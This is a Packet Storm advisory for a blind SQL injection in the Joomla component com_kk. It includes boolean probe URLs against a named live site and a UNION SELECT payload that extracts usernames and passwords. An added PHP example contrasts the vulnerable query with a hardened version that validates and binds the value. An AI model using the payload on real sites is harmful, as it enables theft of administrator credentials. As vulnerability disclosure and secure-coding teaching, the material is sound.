Joomla KK SQL Injection

2010-01-07T00:00:00
ID PACKETSTORM:84883
Type packetstorm
Reporter Pyske
Modified 2010-01-07T00:00:00

Description

                                        
                                            `  
<------------------- header data start ------------------- >  
  
#############################################################  
# Joomla Component com_kk Blind SQL Injection Vulnerability   
#############################################################  
  
# Author : Pyske | Bug Researchers   
  
  
# Name : com_kk  
  
  
# Bug Type : Blind SQL Injection  
  
  
# Infection : Admin login credentials can be obtained.  
  
  
# Demo Vuln. :  
  
TRUE(+)  
  
http://www.klh-trade.si/index.php?option=com_kk&kat=1 and 1=1  
  
FALSE(-)  
  
http://www.klh-trade.si/index.php?option=com_kk&kat=1 and 1=0  
  
# Bug Fix Advice : Harmful characters should be filtered.  
  
#############################################################  
  
< ------------------- header data end of ------------------- >  
  
< -- bug code start -- >  
  
path /index.php?option=com_kk&kat=1/**/and/**/1=0/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/klhtrade_users  
  
< -- bug code end of -- >   
`
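
The fix advice above, applied to a numeric parameter such as kat, shown as an added example that is not code from the advisory or from com_kk. The items table, its columns and both function names are hypothetical, and an in-memory SQLite database with constructed rows stands in for the site's database; the vulnerable pattern sits beside a version that accepts only a positive integer and binds it as a typed parameter.

```php
<?php
// Added example, not the com_kk source. Table, columns and function names are hypothetical.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE items (id INTEGER PRIMARY KEY, kat INTEGER, title TEXT)');
// Constructed sample rows.
$db->exec("INSERT INTO items (kat, title) VALUES (1, 'row A'), (1, 'row B'), (2, 'row C')");

// Vulnerable pattern: the raw request value becomes part of the SQL text,
// so a boolean condition appended to kat changes which rows come back.
function listByCategoryUnsafe(PDO $db, string $kat): array
{
    return $db->query("SELECT title FROM items WHERE kat = $kat")
              ->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: accept only a positive decimal integer, then bind it as a typed
// parameter so the value can never be parsed as SQL.
function listByCategorySafe(PDO $db, string $kat): array
{
    $id = filter_var($kat, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('kat must be a positive integer');
    }
    $stmt = $db->prepare('SELECT title FROM items WHERE kat = :kat');
    $stmt->bindValue(':kat', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// The TRUE/FALSE pair from the advisory, next to a normal value.
foreach (['1', '1 and 1=1', '1 and 1=0'] as $kat) {
    $unsafe = count(listByCategoryUnsafe($db, $kat));
    try {
        $safe = count(listByCategorySafe($db, $kat)) . ' rows';
    } catch (InvalidArgumentException $e) {
        $safe = 'rejected';
    }
    printf("kat=%-10s unsafe: %d rows, safe: %s\n", $kat, $unsafe, $safe);
}
```

Validating the type and binding the value removes the need to enumerate harmful characters, which is easy to get wrong for a parameter that should only ever be a number.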